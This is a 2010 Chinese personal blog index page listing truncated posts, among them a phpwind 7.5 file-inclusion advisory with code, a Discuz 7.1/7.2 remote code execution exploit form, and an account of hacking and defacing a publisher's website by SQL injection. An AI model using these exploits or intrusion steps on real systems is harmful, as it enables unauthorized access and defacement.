竾汻's b109_百度空间

百度搜索

最新动态

我的动态 | 好友动态

文章列表

百度被黑了

2010-01-12 17:08

<荒凉的信仰>转载

　　早上上班，打开百度，显示未能打开，本来以为自己的网络有了问题，可访问谷歌就可以，才发现百度被黑了……

　　然后陆续从各个群传来消息说百

阅读全文>>

类别：文章 | 评论(0) | 浏览()

phpwind 7.5 Multiple Include Vulnerabilities

2010-01-11 13:21

author: 80vul
team:http://www.80vul.com

一.api/class_base.php本地包含漏洞

1.描叙

api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.

2. 具体分析

api/class_base.php文件里:

function callback($mode, $method, $params) {
if (!isset($this->classdb[$mode])) {
if (!file_exists(R_P.'api/class_' . $mode . '.php')) {
return new ErrorMsg(API_MODE_NOT_EXISTS, "Class($mode) Not Ex

阅读全文>>

类别：文章 | 评论(0) | 浏览()

php高级注射拿下国防工业出版社

2010-01-11 02:26

权限非常bt 上传php马没一个可以使用的。最后用了cmd小马看下了终端服务没开，开了1433 ，但是asp不支持汗一个，还有就是3306 呵呵mysql 哈。mysql root密码拿到。可惜不可以外部链接。在汗。只改了个主页。服务器没拿到汗。。。ftp 是微软的汗。 ok 了经过不发了。注射拿到的大家也可以去拿。这里小透漏下。mysql5 跨库哈哈哈

类别：黑站检测 | 评论(0) | 浏览()

dz7.1 7.2远程代码执行漏洞exp 逍遥复仇's blog

2010-01-07 02:38

感谢WJS和冰冷的太阳，老君分析过了，我就不多说了，使用exp的话仅限本机测试，其他用途后果自负！
第一种方法：
先注册个用户然后把
<form method="post" action="http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />
<input type="hidden" name="action

阅读全文>>

类别：小技术文章 | 评论(0) | 浏览()

LinuxDeepin 9.12 Final (正式版)发布

2009-12-30 15:42

经过两个多月的努力，5 次 alpha 内部测试、2 次 beta 测试、2 个预览版本，终于，在 2009 年的 12 月 30 日，LinuxDeepin 9.12 正式版如期发布了。

主要特性
•轻量级
◦软件经过精挑细选、再三斟琢，轻量级、好用是我们的选择标准

阅读全文>>

类别：小技术文章 | 评论(0) | 浏览()

网易的开源软件镜像站点张宴' blog

2009-12-28 23:36

网易开通了一个开源软件的镜像站点，网址为：

　　http://mirrors.163.com/

　　提供的镜像有：

　　1、Linux及BSD发行版镜像：FreeBSD、OpenBSD、RedHat、archlinux、centos、debian、fedora、gentoo、trixbox、ubuntu等。

　　2、开源软件镜像：eclipse可扩展开发平台、防火墙、openfiler网络存储管理工具。

　　该镜像目前只有一台杭州电信的服务器，网通用户访问可能会比较慢。

阅读全文>>

类别：小技术文章 | 评论(0) | 浏览()

本网吧用的 ros 最新封迅雷多线程脚本欢迎大家拍砖

2009-12-28 21:25

/ ip firewall address-list
add list="BlockadeXunlei" address=58.61.39.206 comment="tel" disabled=no
add list="BlockadeXunlei" address=58.61.39.209 comment="tel" disabled=no
add list="BlockadeXunlei" address=58.61.39.211 comment="tel" disabled=no
add list="BlockadeXunlei" address=58.61.39.212 comment="tel" disabled=no
add list="BlockadeXunlei" address=58.61.39.214 comment="

阅读全文>>

类别：小技术文章 | 评论(0) | 浏览()

新内核网众LINUX免狗+虚拟磁盘5.6_330_Linux-3.0x86_64位

2009-12-19 05:47

网众5.6 330全新内核64位

最全新版本 5.6330 64位里面有免费的三层更新
来结合网维大师完美版里面我已经说的清楚了······
内核不加任何的补丁自己下了自己去看下！

名字叫:新内核网众LINUX免狗+虚拟

阅读全文>>

类别：空间网页 | 评论(0) | 浏览()

易语言编译后not found the kernel library or the kernel library is invalib

2009-12-17 16:50

易语言的编译分独立编译和非独立编译两种。

编译的时候，选择独立编译，即可

类别：小技术文章 | 评论(0) | 浏览()

Google也推出免费公共DNS服务器

2009-12-13 14:22

Google今天又给了我们一个惊喜，并沉重的打击了OpenDNS：他们刚刚宣布向所有的互联网用户提供一组快速，安全并且完全免费的DNS解析服务器，地址分别是：
8.8.8.8
8.8.4.4

类别：空间网页 | 评论(0) | 浏览()

近期被封机房名单

2009-12-10 23:24

12月3日，接到了IDC服务商打来的电话，他们近日陆续接到各地通信管理局通知，要求其加强网站备案，否则按5000-1万元/个处罚，甚至断网。
　　根据IDC厂商透露，各地通信管理局近日陆续召开IDC厂商会议，宣布启动新一轮网站备案整治工作。此次行动将严格按照谁接入、谁负责，先备案、后接入的原则。如果发现机房内存在未备案网站，IDC厂商将被处以5000-1万元/个的罚款，情节严重的直接断网。
　　据了解，除整治未备案网站外，部分地区还要求已经备案的用户签订备案承诺书，以确保不出现违规内容。

阅读全文>>

类别：空间网页 | 评论(0) | 浏览()

美女@ LV包包

2009-12-03 12:58

有一天，一位其貌不扬的男士，带着一位十分艳丽的OL，来到Causeway Bay一家LV店。

他为OL选了一价值6万5千元的LV Handbag。

付款时，男士掏出支票本，十分潇洒地签了一张支票。

店员有些为难，因为这对夫妇是第一次来店购物。

男士看穿了店员的心思，十分冷静地对店员说：“我感觉到，您担心这

阅读全文>>

类别：空间网页 | 评论(0) | 浏览()

win2003 可以用的msn9